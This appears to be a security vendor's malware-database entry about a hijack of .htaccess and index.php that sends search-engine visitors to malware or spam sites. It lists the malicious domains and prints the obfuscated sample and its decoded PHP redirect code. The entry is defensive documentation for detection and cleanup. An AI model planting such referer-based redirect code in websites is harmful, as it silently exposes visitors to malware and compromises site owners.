Malware Entries

Description:

This attack uses the .htaccess file to redirect users to a site serving malware (or spam). In some cases, the index.php is also modified to do the redirection as well.

Loads malware from:

http://fgnfdfthrv.bee.pl/
alolipololi.osa.pl
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
and other domains.

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove offending code from .htaccess and/or index.php or contact support@sucuri.net for help.

Links:

http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

eval(base64_decode(“CglpZiAoc3RyaXN0cigkX1NFUlZFUltIV..

Decoded malware:

if (stristr($_SERVER[HTTP_REFERER],”google”)) { if (!stristr($_SERVER[HTTP_REFERER],”.nu”) and !stristr($_SERVER[HTTP_REFERER],”site”) and !stristr($_SERVER[HTTP_REFERER],”inurl”)){ preg_match (“/q=(.*)/”,$_SERVER[HTTP_REFERER],$kk); if (stristr($kk[1],”&”)) { preg_match (“/(.*?)&/”,$kk[1],$key2); $keyword=urldecode($key2[1]); }else { $keyword=urldecode($kk[1]); } header(“Location: http://fgnfdfthrv.bee.pl/?q=”.$keyword); exit(); } }elseif (stristr($_SERVER[HTTP_REFERER],”yahoo”)) { preg_match (“/p=(.*?)&/”,$_SERVER[HTTP_REFERER],$kk); header(“Location: http://fgnfdfthrv.bee.pl/?q=”.$kk[1]); exit(); }elseif (stristr($_SERVER[HTTP_REFERER],”bing”)) { preg_match (“/q=(.*?)&/”,$_SERVER[HTTP_REFERER],$kk); header(“Location: http://fgnfdfthrv.bee.pl/?q=”.$kk[1]); exit(); }